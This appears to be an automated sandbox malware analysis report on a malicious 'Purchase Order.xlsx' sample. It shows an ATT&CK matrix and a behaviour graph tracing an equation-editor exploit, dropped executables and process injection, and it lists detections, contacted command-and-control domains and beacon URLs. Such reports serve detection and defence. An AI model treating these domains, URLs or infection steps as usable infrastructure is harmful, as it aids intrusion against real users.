          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsAccess Token Manipulation1DCSyncVirtualization/Sandbox Evasion2Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobProcess Injection612Proc FilesystemProcess Discovery3Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadowApplication Window Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
          Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork SniffingSystem Owner/User Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
          Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronRight-to-Left OverrideInput CaptureRemote System Discovery1Replication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 344798 Sample: Purchase Order.xlsx Startdate: 27/01/2021 Architecture: WINDOWS Score: 100 51 www.aspiringeyephotos.com 2->51 53 aspiringeyephotos.com 2->53 69 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->69 71 Found malware configuration 2->71 73 Malicious sample detected (through community Yara rule) 2->73 75 12 other signatures 2->75 12 EQNEDT32.EXE 13 2->12         started        17 EXCEL.EXE 37 19 2->17         started        signatures3 process4 dnsIp5 55 cdn.discordapp.com 162.159.130.233, 443, 49165 CLOUDFLARENETUS United States 12->55 45 C:\Users\user\...\scancopy87867678[1].exe, PE32 12->45 dropped 47 C:\Users\Public\vbc.exe, PE32 12->47 dropped 93 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 12->93 19 vbc.exe 13 12->19         started        49 C:\Users\user\Desktop\~$Purchase Order.xlsx, data 17->49 dropped file6 signatures7 process8 file9 41 C:\Users\user\AppData\Local\...\acqyswhf.exe, PE32 19->41 dropped 77 Machine Learning detection for dropped file 19->77 23 acqyswhf.exe 1 19->23         started        signatures10 process11 file12 43 C:\Users\user\AppData\...\dtz25z5e9sr.exe, PE32 23->43 dropped 79 Writes to foreign memory regions 23->79 81 Maps a DLL or memory area into another process 23->81 83 Sample uses process hollowing technique 23->83 27 dtz25z5e9sr.exe 23->27         started        signatures13 process14 signatures15 85 Multi AV Scanner detection for dropped file 27->85 87 Detected unpacking (changes PE section rights) 27->87 89 Modifies the context of a thread in another process (thread injection) 27->89 91 4 other signatures 27->91 30 explorer.exe 27->30 injected process16 dnsIp17 57 land-il.com 50.87.169.249, 49166, 80 UNIFIEDLAYER-AS-1US United States 30->57 59 www.bmtxm.com 103.209.233.78, 49171, 80 POWERLINE-AS-APPOWERLINEDATACENTERHK Hong Kong 30->59 61 9 other IPs or domains 30->61 95 System process connects to network (likely due to code injection or exploit) 30->95 34 svchost.exe 30->34         started        37 autofmt.exe 30->37         started        signatures18 process19 signatures20 63 Modifies the context of a thread in another process (thread injection) 34->63 65 Maps a DLL or memory area into another process 34->65 67 Tries to detect virtualization through RDTSC time measurements 34->67 39 cmd.exe 34->39         started        process21

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          Purchase Order.xlsx24%ReversingLabsDocument-Office.Trojan.Heuristic

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\Public\vbc.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\scancopy87867678[1].exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe5%MetadefenderBrowse
          C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe21%ReversingLabsWin32.PUA.Wacapew

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          5.2.acqyswhf.exe.220000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          4.0.vbc.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
          4.2.vbc.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
          6.1.dtz25z5e9sr.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          6.2.dtz25z5e9sr.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          land-il.com0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.mercadolivre.com.br/0%URL Reputationsafe
          http://www.mercadolivre.com.br/0%URL Reputationsafe
          http://www.mercadolivre.com.br/0%URL Reputationsafe
          http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
          http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
          http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
          http://www.dailymail.co.uk/0%URL Reputationsafe
          http://www.dailymail.co.uk/0%URL Reputationsafe
          http://www.dailymail.co.uk/0%URL Reputationsafe
          http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
          http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
          http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
          http://%s.com0%URL Reputationsafe
          http://%s.com0%URL Reputationsafe
          http://%s.com0%URL Reputationsafe
          http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
          http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
          http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
          http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
          http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
          http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
          http://it.search.dada.net/favicon.ico0%URL Reputationsafe
          http://it.search.dada.net/favicon.ico0%URL Reputationsafe
          http://it.search.dada.net/favicon.ico0%URL Reputationsafe
          http://search.hanafos.com/favicon.ico0%URL Reputationsafe
          http://search.hanafos.com/favicon.ico0%URL Reputationsafe
          http://search.hanafos.com/favicon.ico0%URL Reputationsafe
          http://cgi.search.biglobe.ne.jp/favicon.ico0%Avira URL Cloudsafe
          http://www.abril.com.br/favicon.ico0%URL Reputationsafe
          http://www.abril.com.br/favicon.ico0%URL Reputationsafe
          http://www.abril.com.br/favicon.ico0%URL Reputationsafe
          http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
          http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
          http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
          http://www.bmtxm.com/j5an/?3fk=6SPexGd0ZJ0Mz+FJ+cy7OLUKwTeaGjB/WusfxloW69kYZYqYrDfxiIlikZagIGHK+b+BQQ==&9rO4=E4xhcD5XlJSXW0%Avira URL Cloudsafe
          http://buscar.ozu.es/0%Avira URL Cloudsafe
          http://busca.igbusca.com.br/0%URL Reputationsafe
          http://busca.igbusca.com.br/0%URL Reputationsafe
          http://busca.igbusca.com.br/0%URL Reputationsafe
          http://www.land-il.com/j5an/?3fk=jkLgRzxvTxu7277EKfJN7tKRHYJxZ3c6o/hCpD9wXnjOSj4zaLYT7gQTd+fjCtE9cXdA/Q==&9rO4=E4xhcD5XlJSXW0%Avira URL Cloudsafe
          http://search.auction.co.kr/0%URL Reputationsafe
          http://search.auction.co.kr/0%URL Reputationsafe
          http://search.auction.co.kr/0%URL Reputationsafe
          http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
          http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
          http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
          http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
          http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
          http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
          http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
          http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
          http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
          http://www.streamelemeants.com/j5an/?3fk=hrvp4+cUQU8zV/SJvc4Npds81eds1Wb4LfPiDx6kUcwrGKBrK/T3B2SdIv8rg9j1CS48fg==&9rO4=E4xhcD5XlJSXW0%Avira URL Cloudsafe
          http://google.pchome.com.tw/0%URL Reputationsafe
          http://google.pchome.com.tw/0%URL Reputationsafe
          http://google.pchome.com.tw/0%URL Reputationsafe
          http://www.ozu.es/favicon.ico0%Avira URL Cloudsafe
          http://www.mct.ltd/j5an/?3fk=jfM0s3t3pF6231rQ9Ypgo/tIMSV8ijVp9KulJ4ArWd+XWOyrlsks5AwgkklZ8lU5NlnM6w==&9rO4=E4xhcD5XlJSXW0%Avira URL Cloudsafe
          http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
          http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
          http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
          http://www.gmarket.co.kr/0%URL Reputationsafe
          http://www.gmarket.co.kr/0%URL Reputationsafe
          http://www.gmarket.co.kr/0%URL Reputationsafe
          http://searchresults.news.com.au/0%URL Reputationsafe
          http://searchresults.news.com.au/0%URL Reputationsafe
          http://searchresults.news.com.au/0%URL Reputationsafe
          http://www.asharqalawsat.com/0%URL Reputationsafe
          http://www.asharqalawsat.com/0%URL Reputationsafe
          http://www.asharqalawsat.com/0%URL Reputationsafe
          http://search.yahoo.co.jp0%URL Reputationsafe
          http://search.yahoo.co.jp0%URL Reputationsafe
          http://search.yahoo.co.jp0%URL Reputationsafe
          http://buscador.terra.es/0%URL Reputationsafe
          http://buscador.terra.es/0%URL Reputationsafe
          http://buscador.terra.es/0%URL Reputationsafe
          http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
          http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
          http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
          http://www.iask.com/0%URL Reputationsafe
          http://www.iask.com/0%URL Reputationsafe
          http://www.iask.com/0%URL Reputationsafe
          http://cgi.search.biglobe.ne.jp/0%Avira URL Cloudsafe
          http://search.ipop.co.kr/favicon.ico0%URL Reputationsafe
          http://search.ipop.co.kr/favicon.ico0%URL Reputationsafe
          http://search.ipop.co.kr/favicon.ico0%URL Reputationsafe
          http://p.zhongsou.com/favicon.ico0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          land-il.com
          50.87.169.249
          truetrueunknown
          www.streamelemeants.com
          81.17.18.195
          truetrue
            unknown
            www.fsjinhua.net
            23.228.109.141
            truetrue
              unknown
              www.bmtxm.com
              103.209.233.78
              truetrue
                unknown
                cdn.discordapp.com
                162.159.130.233
                truefalse
                  high
                  aspiringeyephotos.com
                  34.102.136.180
                  truetrue
                    unknown
                    www.mct.ltd
                    104.21.47.75
                    truetrue
                      unknown
                      www.chenangopistolpermit.com
                      208.92.209.208
                      truetrue
                        unknown
                        www.land-il.com
                        unknown
                        unknowntrue
                          unknown
                          www.aspiringeyephotos.com
                          unknown
                          unknowntrue
                            unknown
                            www.aulbalu.com
                            unknown
                            unknowntrue
                              unknown
                              www.chuanxingtong.com
                              unknown
                              unknowntrue
                                unknown
                                www.dchasers.net
                                unknown
                                unknowntrue
                                  unknown

                                  Contacted URLs

                                  NameMaliciousAntivirus DetectionReputation
                                  http://www.bmtxm.com/j5an/?3fk=6SPexGd0ZJ0Mz+FJ+cy7OLUKwTeaGjB/WusfxloW69kYZYqYrDfxiIlikZagIGHK+b+BQQ==&9rO4=E4xhcD5XlJSXWtrue
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.land-il.com/j5an/?3fk=jkLgRzxvTxu7277EKfJN7tKRHYJxZ3c6o/hCpD9wXnjOSj4zaLYT7gQTd+fjCtE9cXdA/Q==&9rO4=E4xhcD5XlJSXWtrue
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.streamelemeants.com/j5an/?3fk=hrvp4+cUQU8zV/SJvc4Npds81eds1Wb4LfPiDx6kUcwrGKBrK/T3B2SdIv8rg9j1CS48fg==&9rO4=E4xhcD5XlJSXWtrue
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.mct.ltd/j5an/?3fk=jfM0s3t3pF6231rQ9Ypgo/tIMSV8ijVp9KulJ4ArWd+XWOyrlsks5AwgkklZ8lU5NlnM6w==&9rO4=E4xhcD5XlJSXWtrue
                                  • Avira URL Cloud: safe
                                  unknown

                                  URLs from Memory and Binaries

                                  NameSourceMaliciousAntivirus DetectionReputation
                                  http://search.chol.com/favicon.icoexplorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                    high
                                    http://www.mercadolivre.com.br/explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    http://www.merlin.com.pl/favicon.icoexplorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    http://search.ebay.de/explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                      high
                                      http://www.mtv.com/explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                        high
                                        http://www.rambler.ru/explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                          high
                                          http://www.nifty.com/favicon.icoexplorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                            high
                                            http://www.dailymail.co.uk/explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            http://www3.fnac.com/favicon.icoexplorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                              high
                                              http://buscar.ya.com/explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                                high
                                                http://search.yahoo.com/favicon.icoexplorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                                  high
                                                  http://www.sogou.com/favicon.icoexplorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                                    high
                                                    http://asp.usatoday.com/explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                                      high
                                                      http://fr.search.yahoo.com/explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                                        high
                                                        http://rover.ebay.comexplorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                                          high
                                                          http://in.search.yahoo.com/explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                                            high
                                                            http://img.shopzilla.com/shopzilla/shopzilla.icoexplorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                                              high
                                                              http://search.ebay.in/explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                high
                                                                http://image.excite.co.jp/jp/favicon/lep.icoexplorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://%s.comexplorer.exe, 00000008.00000000.2195645892.000000000A330000.00000008.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                low
                                                                http://msk.afisha.ru/explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                  high
                                                                  http://busca.igbusca.com.br//app/static/images/favicon.icoexplorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  http://search.rediff.com/explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                    high
                                                                    http://www.windows.com/pctv.explorer.exe, 00000008.00000000.2181773215.0000000003C40000.00000002.00000001.sdmpfalse
                                                                      high
                                                                      http://www.autoitscript.com/autoit3/Jvbc.exe, 00000004.00000002.2182149454.0000000002834000.00000004.00000001.sdmp, acqyswhf.exe, 00000005.00000000.2162676432.0000000000C99000.00000002.00020000.sdmp, dtz25z5e9sr.exe, 00000006.00000000.2164218683.00000000004C9000.00000002.00020000.sdmpfalse
                                                                        high
                                                                        http://www.ya.com/favicon.icoexplorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                          high
                                                                          http://www.etmall.com.tw/favicon.icoexplorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          http://it.search.dada.net/favicon.icoexplorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          http://search.naver.com/explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                            high
                                                                            http://www.google.ru/explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                              high
                                                                              http://search.hanafos.com/favicon.icoexplorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              http://cgi.search.biglobe.ne.jp/favicon.icoexplorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              http://www.abril.com.br/favicon.icoexplorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              http://search.daum.net/explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                high
                                                                                http://search.naver.com/favicon.icoexplorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                  high
                                                                                  http://search.msn.co.jp/results.aspx?q=explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  unknown
                                                                                  http://www.clarin.com/favicon.icoexplorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                    high
                                                                                    http://buscar.ozu.es/explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    http://kr.search.yahoo.com/explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                      high
                                                                                      http://search.about.com/explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                        high
                                                                                        http://busca.igbusca.com.br/explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        • URL Reputation: safe
                                                                                        • URL Reputation: safe
                                                                                        unknown
                                                                                        http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activityexplorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                          high
                                                                                          http://www.ask.com/explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                            high
                                                                                            http://www.priceminister.com/favicon.icoexplorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                              high
                                                                                              http://www.cjmall.com/explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                high
                                                                                                http://search.centrum.cz/explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                  high
                                                                                                  http://suche.t-online.de/explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                    high
                                                                                                    http://www.google.it/explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                      high
                                                                                                      http://search.auction.co.kr/explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      • URL Reputation: safe
                                                                                                      • URL Reputation: safe
                                                                                                      unknown
                                                                                                      http://www.ceneo.pl/explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                        high
                                                                                                        http://www.amazon.de/explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                          high
                                                                                                          http://nsis.sf.net/NSIS_Errorvbc.exe, vbc.exe, 00000004.00000002.2181033509.000000000040A000.00000004.00020000.sdmpfalse
                                                                                                            high
                                                                                                            http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervexplorer.exe, 00000008.00000000.2191369780.000000000856E000.00000004.00000001.sdmpfalse
                                                                                                              high
                                                                                                              http://sads.myspace.com/explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                high
                                                                                                                http://busca.buscape.com.br/favicon.icoexplorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                • URL Reputation: safe
                                                                                                                • URL Reputation: safe
                                                                                                                unknown
                                                                                                                http://www.pchome.com.tw/favicon.icoexplorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                • URL Reputation: safe
                                                                                                                • URL Reputation: safe
                                                                                                                unknown
                                                                                                                http://browse.guardian.co.uk/favicon.icoexplorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                • URL Reputation: safe
                                                                                                                • URL Reputation: safe
                                                                                                                unknown
                                                                                                                http://google.pchome.com.tw/explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                • URL Reputation: safe
                                                                                                                • URL Reputation: safe
                                                                                                                unknown
                                                                                                                http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                  high
                                                                                                                  http://www.rambler.ru/favicon.icoexplorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                    high
                                                                                                                    http://uk.search.yahoo.com/explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                      high
                                                                                                                      http://espanol.search.yahoo.com/explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                        high
                                                                                                                        http://www.ozu.es/favicon.icoexplorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        unknown
                                                                                                                        http://search.sify.com/explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                          high
                                                                                                                          http://openimage.interpark.com/interpark.icoexplorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                            high
                                                                                                                            http://search.yahoo.co.jp/favicon.icoexplorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            • URL Reputation: safe
                                                                                                                            • URL Reputation: safe
                                                                                                                            unknown
                                                                                                                            http://search.ebay.com/explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                              high
                                                                                                                              http://www.gmarket.co.kr/explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              • URL Reputation: safe
                                                                                                                              • URL Reputation: safe
                                                                                                                              unknown
                                                                                                                              http://search.nifty.com/explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                high
                                                                                                                                http://searchresults.news.com.au/explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                unknown
                                                                                                                                http://www.google.si/explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://www.google.cz/explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://www.soso.com/explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://www.univision.com/explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://search.ebay.it/explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                          high
                                                                                                                                          http://images.joins.com/ui_c/fvc_joins.icoexplorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://www.asharqalawsat.com/explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
                                                                                                                                            http://busca.orange.es/explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://cnweb.search.live.com/results.aspx?q=explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                high
                                                                                                                                                http://auto.search.msn.com/response.asp?MT=explorer.exe, 00000008.00000000.2195645892.000000000A330000.00000008.00000001.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  http://search.yahoo.co.jpexplorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  unknown
                                                                                                                                                  http://www.target.com/explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    http://buscador.terra.es/explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    unknown
                                                                                                                                                    http://search.orange.co.uk/favicon.icoexplorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    unknown
                                                                                                                                                    http://www.iask.com/explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    unknown
                                                                                                                                                    http://www.tesco.com/explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      http://cgi.search.biglobe.ne.jp/explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                      unknown
                                                                                                                                                      http://search.seznam.cz/favicon.icoexplorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                        high
